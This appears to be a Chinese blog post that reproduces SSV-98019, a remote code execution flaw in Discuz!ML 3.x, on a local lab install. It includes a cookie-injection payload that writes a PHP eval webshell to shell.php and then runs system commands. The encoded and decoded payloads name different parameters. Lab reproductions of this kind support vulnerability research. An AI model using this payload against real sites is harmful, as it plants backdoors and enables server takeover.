Discuz!ML3.X代码注入漏洞复现

admin 2022年3月1日23:33:06评论264 views字数 800阅读2分40秒阅读模式


 

一、背景

漏洞编号:SSV-98019

影响范围: Discuz!ML (<= 3.4)

漏洞影响:漏洞在于cookie的语言可控并且没有严格过滤,注入后导致可以远程代码执行,通过利用漏洞可直接getshell


二、漏洞复现

0x01环境搭建

直接官网下载即可http://discuz.ml/download

将压缩包解压至phpstudy网站根目录,浏览器访问upload目录即可

开始安装

Discuz!ML3.X代码注入漏洞复现

Discuz!ML3.X代码注入漏洞复现



0x02漏洞复现

访问127.0.0.1/discuz!ml3.3/upload/home.php,访问别的php文件也可以,cookie字段中会出现xxxx_xxxx_language字段,根本原因就是这个字段存在注入,导致的RCE

Discuz!ML3.X代码注入漏洞复现


漏洞在于cookie的语言可控并且没有严格过滤,注入后导致可以远程代码执行抓包找到cookielanguage的值修改为xxxx_xxxx_language=sc'.phpinfo().',成功执行,

Discuz!ML3.X代码注入漏洞复现


构造一句话,连接caidao

Discuz!ML3.X代码注入漏洞复现


payload%27.%2Bfile_put_contents%28%27shell.php%27%2Curldecode%28%27%253C%253Fphp%2520eval%2528%2524_POST%255B%25221%2522%255D%2529%253B%253F%253E%27%29%29.%27

实际为:'.+file_put_contents('shell.php',urldecode('<?phpeval($_POST["cmd"]);?>')).'

Discuz!ML3.X代码注入漏洞复现

可看到路径下生成shell.php,链接密码为cmd

访问http://127.0.0.1/vot-discuz.ml/upload/shell.php?cmd=system('whoami');即成功执行命令

 


本文始发于微信公众号(凌晨安全):Discuz!ML3.X代码注入漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月1日23:33:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Discuz!ML3.X代码注入漏洞复现http://cn-sec.com/archives/497623.html

发表评论

匿名网友 填写信息